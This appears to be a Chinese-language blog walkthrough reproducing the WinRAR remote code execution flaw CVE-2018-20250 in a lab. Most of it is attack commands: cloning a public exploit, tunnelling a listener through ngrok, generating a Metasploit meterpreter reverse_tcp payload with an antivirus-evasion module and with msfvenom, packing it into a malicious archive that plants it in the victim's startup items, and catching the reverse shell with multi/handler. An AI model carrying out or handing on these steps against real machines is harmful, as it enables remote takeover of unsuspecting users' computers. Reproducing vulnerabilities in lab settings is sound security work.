WinRAR远程代码执行漏洞复现(CVE-2018-20250)

文章目录

    • 准备环境
    • CVE-2018-20250漏洞利用复现
    • 另一种复现手法

准备环境

WinRAR < 5.70 (UNACEV2.DLL还存在)
我使用的WinRAR版本: 5.61.0.0.
靶机:我使用的时win10 1903专业版
靶机条件:需要关掉安全中心,不然会把恶意文件删掉
WINRAR下载:http://zdfans7.com/WinRAR_5737.zip

exp下载:https://github.com/WyAtu/CVE-2018-20250.git

git clone https://github.com/WyAtu/CVE-2018-20250.git

CVE-2018-20250漏洞利用复现

1、下载WinRAR远程代码执行漏洞EXP
https://github.com/WyAtu/CVE-2018-20250
2、配置ngrok
https://www.ngrok.cc
选择服务器,我选择的是免费的ngrok服务器
开通一个免费的隧道转发代理,把ngrok隧道协议设置成 TCP,内网 IP 改成自己的 kali 里的内网 IP,内网端口随便填,不冲突就行。
WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第1张图片
3、下载ngrok脚本
我选择的是 Linux 64Bit版本 。先切换到sunny所在目录下再运行脚本。

./sunny clientid 隧道ID

在这里插入图片描述
WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第2张图片
4、使用msf生成payload

msfconsole
use evasion/windows/windows_defender_exe   # (选择msf5免杀模块)
show info   #(显示模块信息)
set filename WinRarPayloadTest.exe   #(设置Payload名字 )
set payload windows/meterpreter/reverse_tcp   #(设置Payload类型 )
set lhost free.idcfengye.com   #(设置上线地址,填写Ngrok映射出去的地址即可)
set lport 10975   #(设置监听端口,填写Ngrok映射出去的端口即可 )
run   #(生成Payload)

WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第3张图片
5、生成恶意文件

设置完之后,运行python3 exp.py 来生成恶意文件

python3 exp.py

WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第4张图片
6、对方解压
WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第5张图片
每当对方重启电脑时,启动项里的应用都会随之而启动

7、使用监听模块,并设置参数

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.102 #(ngrok对应的ip)
set lport 45567 #(ngrok对应的端口)
run

WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第6张图片

另一种复现手法

1、下载WinRAR漏洞
exp下载:https://github.com/WyAtu/CVE-2018-20250.git
2、利用msfbenom生成恶意文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444-f exe >./msf.exe

WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第7张图片
3、把生成的msf.exe复制到对应的exp里去

cp 

打开exp.py并修改对应的地方
WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第8张图片
利用 python3 运行exp.py生成对应的压缩包名字

python3 exp.py

WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第9张图片
4、把生成的恶意文件发送给靶机
一旦靶机解压恶意文件
WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第10张图片

5、使用监听模块,并设置参数

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 4444

WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第11张图片
运行run,监听靶机是否运行了恶意文件hi.exe
WinRAR远程代码执行漏洞复现(CVE-2018-20250)_第12张图片

你可能感兴趣的:(漏洞复现)